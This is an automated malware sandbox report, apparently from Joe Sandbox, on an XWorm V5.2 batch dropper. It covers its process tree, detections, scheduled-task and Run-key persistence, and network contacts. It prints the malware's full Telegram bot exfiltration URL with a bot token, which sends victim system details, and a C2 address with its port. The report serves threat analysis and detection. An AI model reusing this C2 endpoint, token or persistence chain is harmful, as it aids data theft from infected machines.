        Application Window Discovery
        VNCGUI Input Capture4
        Application Layer Protocol
        Data Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
        Virtualization/Sandbox Evasion
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
        Process Injection
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1497356 Sample: Pollosappnuevo.bat Startdate: 22/08/2024 Architecture: WINDOWS Score: 100 69 api.telegram.org 2->69 75 Suricata IDS alerts for network traffic 2->75 77 Antivirus detection for dropped file 2->77 79 Yara detected XWorm 2->79 83 13 other signatures 2->83 12 cmd.exe 1 2->12         started        15 e45iasd.exe 2->15         started        17 e45iasd.exe 2->17         started        19 2 other processes 2->19 signatures3 81 Uses the Telegram API (likely for C&C communication) 69->81 process4 signatures5 101 Suspicious powershell command line found 12->101 103 Wscript starts Powershell (via cmd or directly) 12->103 105 Bypasses PowerShell execution policy 12->105 21 powershell.exe 3 19 12->21         started        25 net.exe 1 12->25         started        27 conhost.exe 12->27         started        107 Powershell is started from unusual location (likely to bypass HIPS) 15->107 109 Reads the Security eventlog 15->109 111 Reads the System eventlog 15->111 29 conhost.exe 15->29         started        31 conhost.exe 17->31         started        113 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->113 115 Suspicious execution chain found 19->115 33 conhost.exe 19->33         started        process6 file7 65 C:\Users\user\AppData\...\startup_str_616.vbs, ASCII 21->65 dropped 67 C:\Users\user\AppData\...\startup_str_616.bat, DOS 21->67 dropped 89 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->89 91 Suspicious powershell command line found 21->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 21->93 95 Powershell drops PE file 21->95 35 wscript.exe 1 21->35         started        38 powershell.exe 37 21->38         started        40 net1.exe 1 25->40         started        signatures8 process9 signatures10 85 Wscript starts Powershell (via cmd or directly) 35->85 42 cmd.exe 1 35->42         started        87 Loading BitLocker PowerShell Module 38->87 45 conhost.exe 38->45         started        process11 signatures12 97 Suspicious powershell command line found 42->97 99 Wscript starts Powershell (via cmd or directly) 42->99 47 powershell.exe 15 19 42->47         started        51 net.exe 1 42->51         started        53 conhost.exe 42->53         started        process13 dnsIp14 71 95.98.144.201, 2404, 49718, 49719 TMO-NL-ASNL Netherlands 47->71 73 api.telegram.org 149.154.167.220, 443, 49717 TELEGRAMRU United Kingdom 47->73 61 C:\Users\user\AppData\Roaming\...\e45iasd.lnk, MS 47->61 dropped 63 C:\Users\user\AppData\Local\...\e45iasd.exe, PE32+ 47->63 dropped 55 schtasks.exe 47->55         started        57 net1.exe 1 51->57         started        file15 process16 process17 59 conhost.exe 55->59         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Pollosappnuevo.bat11%ReversingLabsScript-BAT.Trojan.Alien
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\startup_str_616.vbs100%AviraVBS/Runner.VPXO
        C:\Users\user\AppData\Local\Temp\e45iasd.exe0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://oneget.orgX0%URL Reputationsafe
        http://www.microsoft.0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://oneget.org0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
        https://api.telegram.org/bot0%Avira URL Cloudsafe
        https://api.telegram.org/bot6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q/sendMessage?chat_id=6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A34B1CC6324AA14E91F87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NW4C52%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.20%Avira URL Cloudsafe
        http://www.microsoft.co0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        api.telegram.org
        149.154.167.220
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q/sendMessage?chat_id=6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A34B1CC6324AA14E91F87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NW4C52%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1520433343.00000263B3CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1424079642.0000027568306000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B5F4000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2969443709.000001803B2A0000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0e45iasd.exe, 00000016.00000002.2598736116.000001802CBF8000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://pesterbdd.com/images/Pester.pnge45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://api.telegram.org/botpowershell.exe, 00000010.00000002.2604118350.00000121C6418000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmle45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://go.microe45iasd.exe, 00000016.00000002.2598736116.000001802C14F000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A36443A000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB33751000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1520433343.00000263B3CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1424079642.0000027568306000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802CF12000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2969443709.000001803B2A0000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.microsoft.coe45iasd.exe, 0000001A.00000002.2597249004.000001EB310F5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://contoso.com/Licensee45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Icone45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://oneget.orgXe45iasd.exe, 00000016.00000002.2598736116.000001802CBF8000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.microsoft.powershell.exe, 00000008.00000002.1430188190.00000275708B5000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aka.ms/pscore68powershell.exe, 00000005.00000002.1465156371.00000263A3AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1404589530.0000027558291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2604118350.00000121C5B21000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B211000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A363BAF000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A363BBD000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB32F23000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB32F3D000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1465156371.00000263A3AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1404589530.0000027558291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2604118350.00000121C5B21000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B211000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A363BE4000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB32F23000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://github.com/Pester/Pestere45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://oneget.orge45iasd.exe, 00000016.00000002.2598736116.000001802CBF8000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          149.154.167.220
          api.telegram.orgUnited Kingdom
          62041TELEGRAMRUtrue
          95.98.144.201
          unknownNetherlands
          31615TMO-NL-ASNLtrue
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1497356
          Start date and time:2024-08-22 13:10:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 56s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:31
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Sample name:Pollosappnuevo.bat
          Detection:MAL
          Classification:mal100.troj.expl.evad.winBAT@33/23@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 54%
          • Number of executed functions: 38
          • Number of non-executed functions: 1
          Cookbook Comments:
          • Found application associated with file extension: .bat
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, UsoClient.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: Pollosappnuevo.bat
          TimeTypeDescription
          07:11:03API Interceptor3266473x Sleep call for process: powershell.exe modified
          07:11:24API Interceptor206x Sleep call for process: e45iasd.exe modified
          12:11:09Task SchedulerRun new task: RuntimeBroker_startup_616_str path: C:\Users\user\AppData\Roaming\startup_str_616.vbs
          12:11:22Task SchedulerRun new task: e45iasd path: C:\Users\user\AppData\Local\Temp\e45iasd.exe
          12:11:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run e45iasd C:\Users\user\AppData\Local\Temp\e45iasd.exe
          12:11:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run e45iasd C:\Users\user\AppData\Local\Temp\e45iasd.exe
          12:11:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e45iasd.lnk
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          149.154.167.220Xclient.exeGet hashmaliciousXWormBrowse
            PollosAplicaccion.batGet hashmaliciousXWormBrowse
              Pollos.exeGet hashmaliciousXWormBrowse
                lYL8naoHXw.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                  NEW.P.ORDER .ENQUIRY56433.PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    kgMdslznpG.htaGet hashmaliciousCobalt Strike, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                      DHL Shipping Document_308-4716.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                        st.exeGet hashmaliciousXWormBrowse
                          XClient.exeGet hashmaliciousXWormBrowse
                            SecuriteInfo.com.Win32.CrypterX-gen.19624.6979.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RedLine, zgRATBrowse
                              95.98.144.201Xclient.exeGet hashmaliciousXWormBrowse
                                PollosAplicaccion.batGet hashmaliciousXWormBrowse
                                  Pollos.exeGet hashmaliciousXWormBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    api.telegram.orgXclient.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    PollosAplicaccion.batGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    Pollos.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    lYL8naoHXw.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    NEW.P.ORDER .ENQUIRY56433.PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    kgMdslznpG.htaGet hashmaliciousCobalt Strike, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    DHL Shipping Document_308-4716.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    st.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    XClient.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    SecuriteInfo.com.Win32.CrypterX-gen.19624.6979.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RedLine, zgRATBrowse
                                    • 149.154.167.220
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TELEGRAMRUXclient.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    PollosAplicaccion.batGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    Pollos.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 149.154.167.99
                                    lYL8naoHXw.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    NEW.P.ORDER .ENQUIRY56433.PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    kgMdslznpG.htaGet hashmaliciousCobalt Strike, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    DHL Shipping Document_308-4716.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    st.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    TMO-NL-ASNLXclient.exeGet hashmaliciousXWormBrowse
                                    • 95.98.144.201
                                    PollosAplicaccion.batGet hashmaliciousXWormBrowse
                                    • 95.98.144.201
                                    Pollos.exeGet hashmaliciousXWormBrowse
                                    • 95.98.144.201
                                    KKveTTgaAAsecNNaaaa.arm.elfGet hashmaliciousUnknownBrowse
                                    • 178.228.167.2
                                    botx.arm.elfGet hashmaliciousMiraiBrowse
                                    • 84.241.253.4
                                    45.66.231.213-mipsel-2024-08-09T11_47_09.elfGet hashmaliciousUnknownBrowse
                                    • 178.226.17.189
                                    x86.elfGet hashmaliciousUnknownBrowse
                                    • 178.230.145.133
                                    xd.arm7.elfGet hashmaliciousMiraiBrowse
                                    • 91.141.206.110
                                    XkdNB2mGwN.elfGet hashmaliciousMiraiBrowse
                                    • 178.230.74.199
                                    q0BdVNSe7w.elfGet hashmaliciousMiraiBrowse
                                    • 178.232.196.154
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eXclient.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    PollosAplicaccion.batGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    Pollos.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    RFQ#003110-Al Nasr.exeGet hashmaliciousAgentTeslaBrowse
                                    • 149.154.167.220
                                    hesaphareketi__20240822.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    hesaphareketi__20240822.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    5831205-POS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 149.154.167.220
                                    lYL8naoHXw.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    http://lisasierra.comGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    NEW.P.ORDER .ENQUIRY56433.PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\e45iasd.exePollosAplicaccion.batGet hashmaliciousXWormBrowse
                                      gcapi64.cmdGet hashmaliciousUnknownBrowse
                                        fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                          fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                            file.exeGet hashmaliciousUnknownBrowse
                                              BrowserUpdater.lnkGet hashmaliciousUnknownBrowse
                                                Updater.lnkGet hashmaliciousUnknownBrowse
                                                  ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                    IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      7XU2cRFInT.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):9713
                                                        Entropy (8bit):4.940954773740904
                                                        Encrypted:false
                                                        SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emq:cEU/iQ0HzAFGLCib4Sib4IY1Y
                                                        MD5:CAA3941248728535C7AFD19683C2FE46
                                                        SHA1:74848C69CB14FC06C53D350E8156F9160F730112
                                                        SHA-256:EC129D97386F9F1CD44908FA5C8C9163DA7DA5869793A861EE074A6B77D0E18A
                                                        SHA-512:94A9474447DB299556FA6323AEBBC2C1F5808FAA70AFA5394E24F3FB8567F5C821D49D0E9D158004C4829EFA7CE2093BB99437356005E59967C7120630ADE893
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:Nlllultnxj:NllU
                                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                        Malicious:false
                                                        Preview:@...e................................................@..........
                                                        Process:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
